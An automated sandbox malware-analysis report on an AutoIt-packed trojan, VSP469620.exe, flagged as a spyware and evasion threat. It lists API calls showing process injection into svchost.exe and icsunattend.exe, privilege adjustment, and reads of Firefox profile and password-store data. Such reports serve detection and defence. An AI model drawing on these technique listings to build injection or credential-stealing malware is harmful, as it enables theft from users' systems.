Source: VSP469620.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5a5057dd-9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_006FC8E3 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_032735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03274340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03274650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03272CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03273010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03273090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_032739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03273D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03273D70 NtOpenThread
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04584650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04584340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_045835C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_045839B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582FA0 NtQuerySection
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04582B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04583010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04583090 NtSetValueKey
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04583D70 NtOpenThread
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_04583D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_00379350 NtCreateFile
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_003794C0 NtReadFile
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_003795B0 NtDeleteFile
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_00379650 NtClose
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_003797B0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AF6685 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AEAF64 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AF79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322F1724_2_0322F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0330B16B4_2_0330B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324B1B04_2_0324B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F70E94_2_032F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FF0E04_2_032FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EF0CC4_2_032EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032470C04_2_032470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FF7B04_2_032FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032317EC4_2_032317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032856304_2_03285630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F16CC4_2_032F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F75714_2_032F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DD5B04_2_032DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_033095C34_2_033095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FF43F4_2_032FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032314604_2_03231460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFB764_2_032FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325FB804_2_0325FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B5BF04_2_032B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0327DBF94_2_0327DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B3A6C4_2_032B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFA494_2_032FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F7A464_2_032F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DDAAC4_2_032DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03285AA04_2_03285AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E1AA34_2_032E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EDAC64_2_032EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D59104_2_032D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032499504_2_03249950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325B9504_2_0325B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AD8004_2_032AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032438E04_2_032438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFF094_2_032FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFFB14_2_032FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03241F924_2_03241F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03203FD24_2_03203FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03203FD54_2_03203FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03249EB04_2_03249EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F7D734_2_032F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03243D404_2_03243D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F1D5A4_2_032F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325FDC04_2_0325FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B9C324_2_032B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFCF24_2_032FFCF2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046024467_2_04602446
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F44207_2_045F4420
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045FE4F67_2_045FE4F6
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045505357_2_04550535
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046105917_2_04610591
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456C6E07_2_0456C6E0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045747507_2_04574750
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045507707_2_04550770
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0454C7C07_2_0454C7C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045E20007_2_045E2000
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045D81587_2_045D8158
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045EA1187_2_045EA118
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045401007_2_04540100
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046081CC7_2_046081CC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046041A27_2_046041A2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046101AA7_2_046101AA
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F02747_2_045F0274
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045D02C07_2_045D02C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460A3527_2_0460A352
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046103E67_2_046103E6
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455E3F07_2_0455E3F0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04550C007_2_04550C00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04540CF27_2_04540CF2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F0CB57_2_045F0CB5
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045ECD1F7_2_045ECD1F
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455AD007_2_0455AD00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0454ADE07_2_0454ADE0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04568DBF7_2_04568DBF
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04550E597_2_04550E59
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460EE267_2_0460EE26
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460EEDB7_2_0460EEDB
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04562E907_2_04562E90
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460CE937_2_0460CE93
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045C4F407_2_045C4F40
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04570F307_2_04570F30
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F2F307_2_045F2F30
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04592F287_2_04592F28
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04542FC87_2_04542FC8
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455CFE07_2_0455CFE0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045CEFA07_2_045CEFA0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455A8407_2_0455A840
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045528407_2_04552840
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0457E8F07_2_0457E8F0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045368B87_2_045368B8
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045669627_2_04566962
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0461A9A67_2_0461A9A6
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045529A07_2_045529A0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0454EA807_2_0454EA80
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460AB407_2_0460AB40
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04606BD77_2_04606BD7
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045414607_2_04541460
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460F43F7_2_0460F43F
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046075717_2_04607571
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046195C37_2_046195C3
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045ED5B07_2_045ED5B0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045956307_2_04595630
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046016CC7_2_046016CC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045417EC7_2_045417EC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460F7B07_2_0460F7B0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460F0E07_2_0460F0E0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_046070E97_2_046070E9
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045FF0CC7_2_045FF0CC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045570C07_2_045570C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0461B16B7_2_0461B16B
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0453F1727_2_0453F172
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0458516C7_2_0458516C
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0455B1B07_2_0455B1B0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456B2C07_2_0456B2C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F12ED7_2_045F12ED
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045552A07_2_045552A0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0453D34C7_2_0453D34C
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460132D7_2_0460132D
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0459739A7_2_0459739A
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045C9C327_2_045C9C32
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FCF27_2_0460FCF2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04607D737_2_04607D73
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04553D407_2_04553D40
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04601D5A7_2_04601D5A
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456FDC07_2_0456FDC0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04559EB07_2_04559EB0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FF097_2_0460FF09
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04513FD27_2_04513FD2
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04513FD57_2_04513FD5
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04551F927_2_04551F92
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FFB17_2_0460FFB1
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045BD8007_2_045BD800
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045538E07_2_045538E0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045599507_2_04559950
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456B9507_2_0456B950
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045E59107_2_045E5910
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04607A467_2_04607A46
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FA497_2_0460FA49
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045C3A6C7_2_045C3A6C
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045FDAC67_2_045FDAC6
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045EDAAC7_2_045EDAAC
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04595AA07_2_04595AA0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045F1AA37_2_045F1AA3
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0460FB767_2_0460FB76
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0458DBF97_2_0458DBF9
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045C5BF07_2_045C5BF0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0456FB807_2_0456FB80
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_00361E207_2_00361E20
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035CCF97_2_0035CCF9
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035CD007_2_0035CD00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035CF207_2_0035CF20
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035AF007_2_0035AF00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035B0507_2_0035B050
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0035B0457_2_0035B045
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003655007_2_00365500
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003637027_2_00363702
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003637007_2_00363700
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0037BCB07_2_0037BCB0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436E4C47_2_0436E4C4
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436E3A47_2_0436E3A4
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436E8687_2_0436E868
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436E85C7_2_0436E85C
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436D8F47_2_0436D8F4
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0436D9287_2_0436D928
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 283 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 109 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04597E54 appears 109 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 045CF290 appears 105 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 0453B970 appears 283 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 04585130 appears 58 times
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: String function: 045BEA12 appears 86 times
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: String function: 00ACEC2F appears 68 times
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: String function: 00ADF8A0 appears 35 times
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: String function: 00AD6AC0 appears 42 times
                Source: VSP469620.exe, 00000002.00000003.1302309170.0000000003BAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs VSP469620.exe
                Source: VSP469620.exe, 00000002.00000003.1301002038.00000000039B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs VSP469620.exe
                Source: VSP469620.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/6
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFCE7A GetLastError,FormatMessageW,2_2_00AFCE7A
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AEAB84 AdjustTokenPrivileges,CloseHandle,2_2_00AEAB84
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AEB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00AEB134
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00AFE1FD
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00AF6532
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B0C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,2_2_00B0C18C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_00AB406B
                Source: C:\Users\user\Desktop\VSP469620.exeFile created: C:\Users\user\AppData\Local\Temp\aut4E21.tmpJump to behavior
                Source: VSP469620.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: icsunattend.exe, 00000007.00000002.3142248419.00000000028D3000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.2004604015.00000000028D3000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.2004452213.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3142248419.00000000028FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: VSP469620.exeReversingLabs: Detection: 63%
                Source: VSP469620.exeVirustotal: Detection: 64%
